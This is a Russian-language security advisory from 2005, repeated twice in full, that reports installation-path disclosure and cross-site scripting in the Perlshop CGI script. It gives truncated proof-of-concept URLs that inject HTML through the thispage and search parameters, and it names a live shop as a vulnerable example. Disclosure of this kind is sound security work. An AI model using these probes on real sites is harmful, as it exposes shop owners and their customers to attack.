Межсайтовый скриптинг Perlshop < 4.5.01
Вот обнаружил несколько проблем в скипте perlshop.cgi version 4.4.01
и более ранних.
Software: Perlshop < 4.5.01
Vendor: Waverider Systems www.WaveriderSystems.com
Vulnerability: раскрытие инсталяционного пути и межсайтовый
скриптинг
Risk: низкий
Date: 19.12.2005
discovered by durito -durito[at]mail[dot]ru-
HTTP: www.lwb57.org
durito.narod.ru
+~~~:| Details |:
Раскрытие версии скрипта:
http://www.xxx.com/cgi-bin/store/perlshop.cgi/*
Раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop....ID=!ORDERID!
вставляем любой символ в параметр thispage.
Альтернативное раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop....ID=!ORDERID!
В параметре thispage запрашиваем любой несуществующий файл,
например durito.html и смотрим исходный код страницы:
<h3 align="center">The page (/home/studios/public_html/catalog/1.html) you have requested is not available.</h3>
Межсайтовый скриптинг:
http://www.xxx.com/cgi-bin/store/perlshop....ello</h1>
http://www.xxx.com/cgi-bin/store/perlshop....ello</h1>
Так же межсайтовый скриптинг возможен в системе поиска Perlshop.
Примеры:
http://www.hollywoodcostumesandparty.com/c.../perlshop.cgi/*
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!
http://www.hollywoodcostumesandparty.com/c...EHello%3C/h1%3E
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!
Вот обнаружил несколько проблем в скипте perlshop.cgi version 4.4.01
и более ранних.
Software: Perlshop < 4.5.01
Vendor: Waverider Systems www.WaveriderSystems.com
Vulnerability: раскрытие инсталяционного пути и межсайтовый
скриптинг
Risk: низкий
Date: 19.12.2005
discovered by durito -durito[at]mail[dot]ru-
HTTP: www.lwb57.org
durito.narod.ru
+~~~:| Details |:
Раскрытие версии скрипта:
http://www.xxx.com/cgi-bin/store/perlshop.cgi/*
Раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop....ID=!ORDERID!
вставляем любой символ в параметр thispage.
Альтернативное раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop....ID=!ORDERID!
В параметре thispage запрашиваем любой несуществующий файл,
например durito.html и смотрим исходный код страницы:
<h3 align="center">The page (/home/studios/public_html/catalog/1.html) you have requested is not available.</h3>
Межсайтовый скриптинг:
http://www.xxx.com/cgi-bin/store/perlshop....ello</h1>
http://www.xxx.com/cgi-bin/store/perlshop....ello</h1>
Так же межсайтовый скриптинг возможен в системе поиска Perlshop.
Примеры:
http://www.hollywoodcostumesandparty.com/c.../perlshop.cgi/*
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!
http://www.hollywoodcostumesandparty.com/c...EHello%3C/h1%3E
http://hollywoodcostumesandparty.com/cgi-b...ID=!ORDERID!